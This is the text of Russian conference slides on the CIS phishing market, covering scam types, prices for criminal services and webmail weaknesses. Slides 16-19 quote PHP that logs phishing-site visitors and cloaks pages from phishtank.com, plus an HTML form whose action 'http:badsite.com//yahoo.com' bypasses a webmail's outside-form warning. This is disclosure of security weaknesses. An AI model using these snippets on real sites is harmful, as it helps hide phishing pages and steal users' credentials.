Докладчик расскажет о современном рынке фишинга в СНГ, его формировании, предпосылках развития, о том, какие механизмы сейчас используются. Будут представлены практические кейсы раскрытия слабых мест почтовых сервисов и примеры того, как эти уязвимости способствуют развитию фишингового рынка.
2. ФИШИНГ
Фи́шинг (англ. phishing, от fishing — рыбная ловля,
выуживание) — вид интернет-мошенничества, целью
которого является получение доступа к
конфиденциальным данным пользователей—логинам и
паролям.
3. НАЧАЛО: AOL
Становление технологии фишинга пришлось на 1995 год и
жил на AOL (один из ранних крупнейших в США интернет-
провайдеров).
4. FAX-FISHING ATTACK
Отправить email-письмо жертве от какой либо гос.
структуры
Просить предоставить конфиденциальную информацию и
направить по факсу
На стороне мошенника документ сканируется и
перенаправляется на его почту
???
PROFIT!
5. KEYLOGGER
Письма с простейшим программным обеспечением
считывающим нажатия на клавиатуре и передающим
информацию злоумышленнику
6. «ПИСЬМА СЧАСТЬЯ»
ВЫ – ПОБЕДИТЕЛЬ АКЦИИ
ВЫ – СТОМИЛЛИАРДТЫСЯЧНЫЙ ПОСЕТИТЕЛЬ
ВЫ – ЛЕГКО ЗАРАБОТАЕТЕ ВСЕ ДЕНЬГИ ЗЕМЛИ
Просто нажимай все ссылки!
7. «НИГЕРИЙСКИЕ ПИСЬМА»
Чиновник/космонавт/победитель по жизни получил много
денег
Коварное нигерийское правительство не даёт
возможности снять деньги
Только ТЫ можешь помочь
Просто перешли немного денег для
оформления документов и открытия счёта
8. СООБЩЕНИЕ ОТ АДВОКАТОВ И
ЮРИСТОВ (ИНОГДА И ОТ
РОСКОМНАДЗОРА)
Вы (ВНЕЗАПНО!) получили наследство
Нужно просто оформить бумаги
Но для этого нужно прислать свои данные
(Иногда и добавить файл на сервер)
9. АТАКА КЛОНОВ
Копии легальных сайтов
выглядят как настоящие
Пахнут как настоящие
Стало быть настоящие
(НЕТ)
10. ФИШИНГ И СПАМ – ЭТО НЕ
ДОРОГО
Средняя цена – 1-2$ за 1000 писем
Часто есть и другие услуги сервиса:
сбор клиентских баз, DDOS, взлом почты,
блокировка телефонных линий,
предоставление отчётов и даже обучение.
11. Я В БЛЭКХАТЫ БЫ ПОШЁЛ, ПУСТЬ
МЕНЯ НАУЧАТ!
Учат всему:
Web – пентест
Работа с файерволами
Вирусостроение
Взлом почт и соцсетей
Кардинг
И проч. И проч.
12. ЦЕНЫ
Рассылка:
1-2$ за 1000 сообщений
DDOS: 60$ в день
Найм хакера:
зависит от задачи,
обычно до 300 евро
Обучение:
сильно разнятся
от 2500 до 60000 р
13. СРЕДНЯЯ ЦЕНА СПАМА
2014 год 2015 год 2016 год
0
200
400
600
800
1000
1200
1400
1600
Цена за 10000 писем
Цена за 10000 писем (руб.)
16. ЧТО МОЖНО НАЙТИ НА ФЕЙК-
САЙТЕ
1) Запись данных посетителя
date_default_timezone_set(„Europe/Moscow“);
$u_ip = $_SERVER[„REMOTE_ADDR“];
$u_date = date(« l d F H:i:s»);
$u_agent = $_SERVER[„HTTP_USER_AGENT“];
$fop = fopen («logs/userip.txt», «a»);fputs($fop, «IP: $u_ip =
DATE: $u_date — BROWSER: $u_agentrn»)
17. ЧТО МОЖНО НАЙТИ НА ФЕЙК-
САЙТЕ
2) Проверка на проксирование
$response =
file_get_contents('http://www.shroomery.org/ythan/proxycheck.p
hp?ip='.$u_ip, 0, $context);
3) А если нас проверяют, что пользователь пришел с сайта с
проверкой фишинговых страниц, то можно проверить его
HTTP_REFERE и перекинуть на 404.
if(parse_url($_SERVER[„HTTP_REFERER“], PHP_URL_HOST) ==
„phishtank.com“){
18. ПРОБЛЕМЫ В ПОЧТОВЫХ
СИСТЕМАХ
t.message._formWhiteList = [
, «somedomain.com»],
t.message.formWarning = function(s) {
var i = s.getAttribute("action")
, n = i.split("/")[2];
return n && (n = n.split(".").slice(-2).join("."),
t.message._formWhiteList.indexOf(n) > 0) ? !0 : (e.ErrorLog.send({
event: "formWarning",
host: i
}),
window.confirm("Вы отправляете данные на сайт, не имеющий отношения к
Почтовому ресурсу. Продолжить?"))
}
19. ПРОБЛЕМЫ В ПОЧТОВЫХ
СИСТЕМАХ
Мы отправляем письмо содержащее следующий html код (обратите внимание на
action)
<form
action ='http:badsite.com//yahoo.com'' method=POST>
<input name='show_me_the_money'><br>
<input name='and_mention_on_habrahabr'><br> <input type='submit'>
</form>
В веб интерфейсе action будет выглядеть так:
http:badsite.com//yahoo.com